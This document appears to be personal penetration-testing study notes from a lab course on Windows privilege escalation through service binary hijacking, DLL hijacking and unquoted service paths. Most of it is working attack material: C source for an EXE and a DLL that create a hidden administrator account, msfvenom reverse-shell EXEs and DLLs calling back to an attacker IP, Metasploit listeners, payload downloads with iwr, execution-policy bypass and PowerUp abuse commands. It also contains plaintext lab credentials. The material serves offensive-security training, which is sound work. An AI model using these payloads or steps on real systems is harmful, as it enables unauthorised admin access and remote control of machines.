Leveraging Windows Services

Service Binary Hijacking

When using a network logon such as WinRM or a bind shell, Get-CimInstance and Get-Service will result in a "permission denied" error when querying for services with a non-administrative user. Using an interactive logon such as RDP solves this problem.

Initial Checks:

Is there any binary file running that is installed in an unusual directory?
Do you have permission to write to the path where the file is located?
Is the binary set to auto-restart, or do you have permission to execute (Restart) the binary file?
Additionally, check if you have permission to restart the service by verifying the SeShutdownPrivilege.


# Check for Installed windows Service.
# PowerShell Command
# Check for abnormal installation path

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

# Skipping default system32 folder.
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running' -and $_.PathName -notmatch "WINDOWS\\system32"}

# checking all processes running or stoped both. Skipping default system32 folder. also
# Useful in Unquoted service path attact.
Get-CimInstance -ClassName win32_service | Select Name,State,PathName, StartMode | Where-Object {$_.PathName -notmatch "WINDOWS\\system32"}

# Check the permission of current user to that path.
icacls <PATH OF THE FOLDER>

# Check the restart permission of the binary
Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like '<NameOfTheService>'}
# If not then check the restart permission.

# Check for restart permission
whoami /priv # See the SeShutDownPrivilege. It must be enabled.

While checking the working of binary, if needed you can make a task.

# COpy file to desktop in winprep.
# Create the service for this binary using below command
sc.exe create "Scheduler" binpath= "C:\Users\offsec\Desktop\Scheduler.exe"

# Run the binary or restart it.
Restart-Service Scheduler

Code for making User and creating executable file

174B

adduser.c

Open

adduser.c

#include <stdlib.h>

int main ()
{
  int i;
  
  i = system ("net user dave2 password123! /add");
  i = system ("net localgroup administrators dave2 /add");
  
  return 0;
}

Compiling the code

# Compiling the code to exe
x86_64-w64-mingw32-gcc addusers.c -o adduser.exe

# Sending file to victim.
iwr -uri http://$IP_KALI/adduser.exe -o adduser.exe

# Now Replace the binary file and restart the service.
net stop <ServiceName>

# If you don't permission then first check if that service is set to auto start or not. Then Restart the system if it is set to auto.

Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}

# Also check if you have permission to restart the system or not by checking SeShutdownPrivilege.
whoami /priv

# Restart command
shutdown /r /t 0

# Now check if your user is made or not.
Get-LocalGroupMember Administrators

Now you can access the created account using below commands:

Accessing User (RDP and other method) | Tools | Tips To Securehacking.tipstosecure.com

Directly Getting shell

# This example is from one of the lab.

# Look for abnormal directory 
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

# Check permission
# Found apache2.4 is suspecious.
icacls C:\xampp\apache\bin\

# It has run and read and write permission.

# Source:
http://michalszalkowski.com/security/metasploit/msfvenom/

# Make .exe file
IP_KALI=192.168.45.195  
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=$IP_KALI LPORT=80 -f exe > shell-4444-powershell.exe 

# Starting msfvenom
msfconsole -q -x "use multi/handler; set payload windows/x64/powershell_reverse_tcp; set lhost $IP_KALI; set lport 80; exploit"


# Replace binary with made shell.
move C:\xampp\apache\bin\httpd.exe httpd.exe.bak
move .\shell.exe C:\xampp\apache\bin\httpd.exe

# Try restarting the service
Restart-Service Apache2.4

# if error then try to this:
# Binary is set to auto restart then simply restart the system if you have SeShutdownPrivilege enabled or disabled any thing can be there. If you have this in the list then try restarting ...
whoami /priv 
shutdown /r /t 0

# Got the shell.

Using automated tools

# Copy powerUp to current working directory.
cp /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 .
timeout 120 python3 -m http.server 8000 -d /usr/share/windows-resources/powersploit/Privesc/

# Send it to victim machine.
iwr -uri http://$IP_KALI:8000/PowerUp.ps1 -Outfile PowerUp.ps1

# Bypass the execution policy.
powershell -ep bypass

# Run the powerUp.sh
. .\PowerUp.ps1

# Get list of Service hijackable binary files.
Get-ModifiableServiceFile

# Sevice command is not working then do the manual exploitation.

DLL Hijacking

Best source:

Page not found - HackTricksbook.hacktricks.xyz

This has every thing mentioned here.

Common Technique used during DLL Hijacking

DLL Replacement
DLL Search Order Hijacking
Phantom DLL Hijacking
DLL Redirection
WinSxS DLL Replacement
Relative Path DLL Hijacking

DLL search order

The directory from which the application loaded.
The system directory.
The 16-bit system directory.
The Windows directory.
The current directory.
The directories that are listed in the PATH environment variable.

Initial checks

# Look for suspecious service which is not in default windows directory.
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

# Look inside C:\ Directory for binary file with permissions to Read,write and execute.
ls C:\

# Look for Installed Software and see if there is any DLL hijacking represent uisng online available content.
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

# Look at the location of software (Optional).
# Example:
cmd.exe /c "where /R C:\ *FileZilla*.exe "

# Check the permission on that directory of the current user. (Make Sure you don't have '/' at the end of the file location).
icacls <PATH OF THE SERVICE>
# If you have write or modify permissions, that's a good sign.

# ---------------------
# You can Also start procmon as a different user. 
# Look for DLL it is loading or missing DLL.
# COPY binary to other windows system to examine
# way to do that:

# Start SMB server in kali linux
impacket-smbserver -smb2support -username user -password user123 drive .

# Copy Made .exe file to this server.
# In EXTERNAL machine
net use Z: \\192.168.45.177\drive /user:user user123
copy BetaMonitor.exe Z:

# In WINPREP.
# Copy this binary file.
net use Z: \\192.168.45.177\drive /user:user user123
copy Z:\BetaMonitor.exe C:\temp\BetaMonitor.exe

# In WINPREP 
# In C:\Tools\SysteminternalSuite you will find Procmon. Start it as administrator.
# Add filter for DLL and .exe file as shown below after clicking on Filter ICON or Pressing ctrl + l

# Below shows how and what to look for in procmon. Also what to set in filter.
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dll-hijacking#finding-missing-dlls

# After that Run the binary file.
# To see more details related to attempting DLL hijacking see example below

Best way to analysis the service is to copy it in own system and then run it.

To determine the Path we need to copy it to own system and run it.

# Start procmon as administrator.
# Restart the service.
 Restart-Service <ServiceName>
# Create DLL for adding new user.

Creating User using DLL Hijacking

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
    switch ( ul_reason_for_call )
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        int i;
  	    i = system ("net user dave2 password123! /add");
  	    i = system ("net localgroup administrators dave2 /add");
        break;
        case DLL_THREAD_ATTACH: // A process is creating a new thread.
        break;
        case DLL_THREAD_DETACH: // A thread exits normally.
        break;
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}

# Make DLL
x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll

# Sent it to the Victim and then restart the service.
iwr -uri http://192.168.45.232/myDLL.dll -Outfile myDLL.dll

Restart-Service <ServiceName>

# Check if user is created or not.
Get-LocalGroupMember Administrators

Now you can access the created account using the below commands:

Accessing User (RDP and other method) | Tools | Tips To Securehacking.tipstosecure.com

Example attempt of DLL Hijacking

Others attempted, but failed in a specific scenario due to lacking permissions.

Before running .exe We need to check from were binary file is searching for the dll file named BetaLibrary.dll So, Let's copy file to WINPREP and start procmon as admin.

# Start SMB server in kali linux
impacket-smbserver -smb2support -username user -password user123 drive .

# Copy Made .exe file to this server.
# In EXTERNAL machine
net use Z: \\192.168.45.177\drive /user:user user123
copy BetaMonitor.exe Z:

# In WINPREP.
# Copy this binary file.
C:\temp>net use Z: \\192.168.45.177\drive /user:user user123
The command completed successfully.

C:\temp>copy Z:\BetaMonitor.exe C:\temp\BetaMonitor.exe

# In WINPREP 
# In C:\Tools\SysteminternalSuite you will find Procmon. Start it as administrator.
# Add filter for DLL and .exe file as shown below after clicking on Filter ICON or Pressing ctrl + l

# Our case will apply only process name file.
# Process Name --> Contains --> BetaMonitor --> incluede --> add --> ok
# Create a new filter to display only file end with .dll
# Path --> ends with --> .dll --> include --> add --> ok
# Run exe file.
.\BetaMonitor.exe

# Program is trying to find VERSION.dll in same folder where .exe is located then searches for other file. 
# It's CreateFile function.
# We will put file in same folder where .exe file is present. and run it.
# Switch to EXTERNAL RDP.
# We don't have write permision in the same folder.
PS C:\BetaMonitor> icacls C:\BetaMonitor\
C:\BetaMonitor\ BUILTIN\Users:(OI)(CI)(RX)
                NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                BUILTIN\Administrators:(OI)(CI)(F)
                CREATOR OWNER:(OI)(CI)(IO)(F)

Insufficient Permission.

Example of DLL Hijacking and then getting shell.

Transfer the file.

# In kali linux, Start the server.
impacket-smbserver -smb2support -username user -password user123 drive .

# Using RDP, In powershell, Connect to Share and send the file.
 net use Z: \\192.168.45.205\drive /u:user user123
 
copy C:\Scheduler\scheduler.exe Z:

we will transfer this file to our testing window and then will check for dll files.

start xfreerdp from this folder.

xfreerdp /v:$winprep  /u:offsec /p:lab /cert-ignore /dynamic-resolution /drive:webdev,.

Start the powershell as administrator and run procmon on C:\Tools directory.

Before running this binary we have to create the service, for this binary. Because this is a service file and not a regular binary file.

# COpy file to desktop in winprep.
# Create the service for this binary using below command
sc.exe create "Scheduler" binpath= "C:\Users\offsec\Desktop\Scheduler.exe"

# Run the binary or restart it.
Restart-Service Scheduler

Now you can see if there is any dll file that is missing.

Now we can perform binary hijacking steps.

# Make dll file.
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=$IP_KALI LPORT=443 -f dll -o reverse.dll

# Start listener.
msfconsole -q -x "use multi/handler; set payload windows/x64/powershell_reverse_tcp; set LHOST $IP_KALI; set LPORT 443; run"

# Transfer file to victim machine.
net use Z: \\192.168.45.205\drive /u:user user123
copy Z:\reverse.dll C:\temp

# Now we will transfer it to correct place that is place where binary file is present
 copy .\reverse.dll C:\Scheduler\beyondhelper.dll
 
# Now restart the service.
Restart-Service -Name Scheduler

# Look for the permission

Getting shell using DLL Hijacking

# Make DLL file using the below command:
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=$IP_KALI LPORT=80 -f dll -o reverse.dll

# Below command not allowed in OSCP Exam.
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.158 LPORT=443 -f dll > EnterpriseServiceOptional.dll

# Start the listener. 
msfconsole -q -x "use multi/handler; set payload windows/x64/powershell_reverse_tcp; set LHOST $IP_KALI; set LPORT 80; run"

# Send DLL to victim machine and place the DLL file file where DLL was missing.
# Run the exe file.
# Or Restart the service.
Restart-Service -Name <NAME of The service>

# You will get the shell

Example from Module exercise:

# Got Alex password from .txt file.
# I will connect to alex using RDP

xfreerdp /v:192.168.109.222 /u:alex /p:WelcomeToWinter0121 /cert-ignore /dynamic-resolution

# After looking in C directory, I found one directory named as Service. After reading the file I came to know that there is one missing DLL with name as EnterpriseServiceOptional.dll

PS C:\Services> cat .\EnterpriseServiceLog.log
[00:00:00.000] (b8c) WARN   Couldn't load EnterpriseServiceOptional.dll, only using basic features.'

# I will make dll file and will place it in C:\Service Folder

# In Kali Linux:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=$IP_KALI LPORT=4444 -f dll -o  EnterpriseServiceOptional.dll

# Start listener.
msfconsole -q -x "use multi/handler; set payload windows/x64/shell_reverse_tcp; set lhost $IP_KALI; set lport 4444; exploit"

# Transfer the file into the Service directory.
iwr -uri http://192.168.45.229:8000/EnterpriseServiceOptional.dll -Outfile EnterpriseServiceOptional.dll

# Check if service is running or not.

PS C:\Services> Get-CimInstance -ClassName win32_service | Select Name,State,PathName,StartMode | Where-Object {$_.State -like 'Running'} | Where-Object {$_.Name -like 'Enterpri*'}

Name              State   PathName                            StartMode
----              -----   --------                            ---------
EnterpriseService Running "C:\Services\EnterpriseService.exe" Auto

PS C:\Services> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

PS C:\Services> icacls .
. BUILTIN\Administrators:(I)(OI)(CI)(F)
  NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
  BUILTIN\Users:(I)(OI)(CI)(RX)
  NT AUTHORITY\Authenticated Users:(I)(M)
  NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)

Successfully processed 1 files; Failed processing 0 files

# I will restart the service.
PS C:\Services> Restart-Service -Name EnterpriseService

# Got the shell..

Unquoted Service Paths

Initial Check

# Use the Below command to find the unquoted Service path
# CMD Command.
wmic service get name,pathname |  findstr /i /v "C:\Windows\\" | findstr /i /v """

# You can also use the below command to search for unquoted path but above is more suitable.
Get-CimInstance -ClassName win32_service | Select Name,State,PathName
Get-CimInstance -ClassName win32_service | Select Name,State,PathName,StartMode | Where-Object {$_.PathName -notmatch "WINDOWS\\system32"}

# If you find the service then check if you can start and stop it or not.
Start-Service <ServiceName>
Stop-Service <ServiceName>
# Other way to check:
Get-CimInstance -ClassName win32_service | Select Name,StartMode | Where-Object {$_.Name -like 'NameOfService'}

# If you have permission to write then replace the binary and follow Binary hijacking method. Otherwise check each location with space:

# Now check on which "Spaced" path you have permission to write on as a current user.
# Example:
# Full path: C:\Program Files\Enterprise Apps\Current Version\GammaServ.exe
# Note: Don't add '\' at the end of the loaction. If you are getting error then remove.
icacls "C:\"
icacls "C:\Program Files"
icacls "C:\Program Files\Enterprise Apps"

# If you have write permission then make .exe file with the name of the next location.

Adding user by using exe file

Make exe file (Click here) and send it to the victim machine (Click here).

# only place file in writeable directory.
# Example:
copy .\Current.exe 'C:\Program Files\Enterprise Apps\Current.exe' #Look at the Full Path

# Restart the service
Start-Service <ServiceName>
Stop-Service <ServiceName>

# Check if user is made or not.

Using Getting Reverse shell using .exe file

# Making Reverse exe file.
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=$IP_KALI LPORT=80 -f exe -o reverse.exe

# Start the listener.
msfconsole -q -x "use multi/handler; set payload windows/x64/powershell_reverse_tcp; set LHOST $IP_KALI; set LPORT 80; run"

# Now replace in the location where you found write permission.
# You can use SMB share to copy.
# Restart the service
Start-Service <ServiceName>
Stop-Service <ServiceName>
Restart-Service <ServiceName>

Unoquoted service automated tool

# Copy powerup to current working directory.
cp /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 .

python3 -m http.server 8000 -d /usr/share/windows-resources/powersploit/Privesc/

# Send it to victim machine.
iwr http://$IP_KALI/PowerUp.ps1 -Outfile PowerUp.ps1

# execute policy bypass and run it then look for unquoted service.
powershell -ep bypass
 . .\PowerUp.ps1
 Get-UnquotedService

# Abuse function given by the tool.
# Make sure you find writeable path and then give the path.
# Example:
PS C:\Users\damian> icacls "C:\Enterprise Software\Monitoring Solution"
C:\Enterprise Software\Monitoring Solution CLIENTWK221\damian:(OI)(CI)(RX,W)
                                           BUILTIN\Administrators:(OI)(CI)(F)
                                           NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                                           BUILTIN\Users:(OI)(CI)(RX)
                                           
# now we will give this path with .exe appended before the space.
# Example:
Write-ServiceBinary -Name 'ReynhSurveillance' -Path "C:\Enterprise Software\Monitoring Solution\Surveillance.exe"

# Restart the service.
Restart-Service <Service Name>

# Note: we will get error but user will be created check it.
Get-LocalGroupMember Administrators

# Don't forget to remove the added exe file. by running as administrator user.

Automated tools add user as:

username: john

password: Password123!

PreviousPrivilege Escalation [Searching]NextAbusing Other Windows Components

Last updated 11 months ago